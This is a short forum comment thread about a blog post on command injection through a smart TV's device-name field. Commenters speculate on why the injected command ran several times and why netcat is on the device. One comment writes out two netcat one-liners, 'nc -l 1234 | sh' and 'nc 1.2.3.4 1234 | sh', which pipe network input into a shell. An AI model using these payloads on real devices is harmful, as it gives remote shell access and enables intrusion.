Makes me want to test my own tv.
Magnificent. Direct command injection and opening netcat via one of the lesser used menu options, I'm surprised that that somehow doesn't surprise me.
Well If I was in a limited situation like so with only so many characters allowed, my go to command injection would've been a little different.
nc -l 1234 | sh
or
nc 1.2.3.4 1234 | sh
The blog post really didn't explain why when he said to sleep 2 but froze for 6 seconds. My best guess is that whatever variable is inputted into the "change tv name" box the system takes the inputted variable and uses it in 3 different commands.
Why nc was on the tv is beyond me.
nc is a very handy tool. is probably used for updates
I know it's handy, but I don't see a use for a production model, maybe for diags on rma's?
maybe. was thinking something along the lines to nc a update from the server
Unfortunately my TV sanitized these inputs so no fun for me.
Most embedded systems usually ship with busybox included. nc is part of busybox. That's how it usually ends up in there.